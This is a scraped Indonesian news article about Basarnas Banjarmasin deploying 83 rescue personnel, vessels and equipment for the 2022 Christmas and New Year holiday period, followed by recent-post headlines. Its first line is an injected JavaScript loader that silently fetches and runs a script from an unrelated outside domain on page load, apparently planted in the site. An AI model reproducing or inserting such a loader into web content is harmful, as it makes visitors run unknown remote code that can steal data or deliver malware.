(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kalimantan Selatan

Siaga SAR Nataru, 83 Personel Basarnas Banjarmasin Dikerahkan


KANALKALIMANTAN.COM, BANJARMASIN – Sebanyak 83 personel SAR Basarnas Banjarmasin dikerahkan guna melaksanakan Siaga SAR menjelang Natal dan Tahun Baru (Nataru).

Siaga SAR khusus tersebut dilaksanakan sejak tanggal 19 Desember 2022 hingga 03 Januari 2023.
Puluhan personel itu disiagakan pada beberapa tempat atau unit siaga untuk melakukan pengaturan dan pengendalian transportasi alat utama (Alut).

“Personel yang tersebar di Kantor Basarnas Banjarmasin ditempatkan di 1 Pos SAR dan 2 unit Siaga SAR, yakni di Pos SAR Kotabaru, Unit Siaga SAR Tabalong dan Unit Siaga SAR Batulicin,” ungkap Kepala Kantor Basarnas Banjarmasin, Al Amrad, Selasa (20/12/2022).

Adapun Alut yang disiapkan Kantor Basarnas Banjarmasin di antaranya kapal KN SAR Laksmana 241, kapal RB 207 Banjarmasin, kapal RB 306 Banjarmasin, kapal 12 meter KN 407, dan RIB 01 dan 02.

 

Baca juga  : Tiga Bocah Heroik di Banjarmasin Gagalkan Pencurian, Kapolres Beri Penghargaan

Tak hanya itu, berbagai peralatan disediakan di setiap unit siaga. Seperti peralatan penyelamatan di air, penyelamatan pada kecelakaan kendaraan, penyelamatan di gunung hutan, hingga peralatan penyelamatan di reruntuhan.

“Tingkatkan kesiapan personel Alut dan peralatan agar kecepatan waktu tanggap dan waktu tempuh dapat tercapai secara maksimal, sehingga semakin banyak korban yang bisa diselamatkan apabila saat operasi SAR,” tutur Al Amrad.

Basarnas Banjarmasin telah menyiapkan titik dan rute bagi personelnya. Nantinya, mereka akan mobile ke tempat-tempat wisata dan titik-titik jalur arus mudik seperti Bandara dan pelabuhan, serta Posko-Posko Gabungan.

Dirinya pun menyebut Siaga SAR khusus ini tentunya hadir untuk memberikan rasa aman dan nyaman kepada masyarakat yang akan melaksanakan mudik ataupun liburan.

Baca juga  : Gerayangi Area Sensitif, Pemuda di Peramuan Landasan Ulin ke Sel Polisi

“Agar seluruh personel melaksanakan Siaga SAR khusus tetap pada prinsip yaitu quick response of SAR dalam respon setiap bentuk kedaruratan secara profesional, sinergi dan militan,” pungkasnya.

Sebelumnya, para personel melaksanakan apel persiapan pada Senin (19/12/2022) di lapangan Avignam Kantor Basarnas Banjarmasin.

Puluhan personel itu telah menyebar ke beberapa titik unit siaga dan posko guna membantu pengamanan jalur transportasi. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Desy Arfianty

Recent Posts

Ini Alasan Pemko Banjarbaru Larang Peternakan Babi Ada di Ibu Kota

KANALKALIMANTAN.COM, BANJARBARU - Aktivitas peternakan babi di Kota Banjarbaru kembali menjadi sorotan. Selain dikeluhkan atas… Read More

27 menit ago

Habisi Nyawa Sesama Sopir di Banjarmasin, ARM Ditangkap di Kandangan

KANALKALIMANTAN.COM.COM, BANJARMASIN - Kepolisian Reskrim Polsek Banjarmasin Barat dan tim gabungan berhasil menangkap ARM (21),… Read More

1 jam ago

Peternak Babi di Pandarapan Keberatan Batas Waktu Tiga Bulan Bongkar Kandang

KANALKALIMANTAN.COM, BANJARBARU - Puluhan peternak babi di Jalan Pandarapan RT 34 RW 5, Kelurahan Guntung… Read More

2 jam ago

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

15 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

15 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

16 jam ago

This website uses cookies.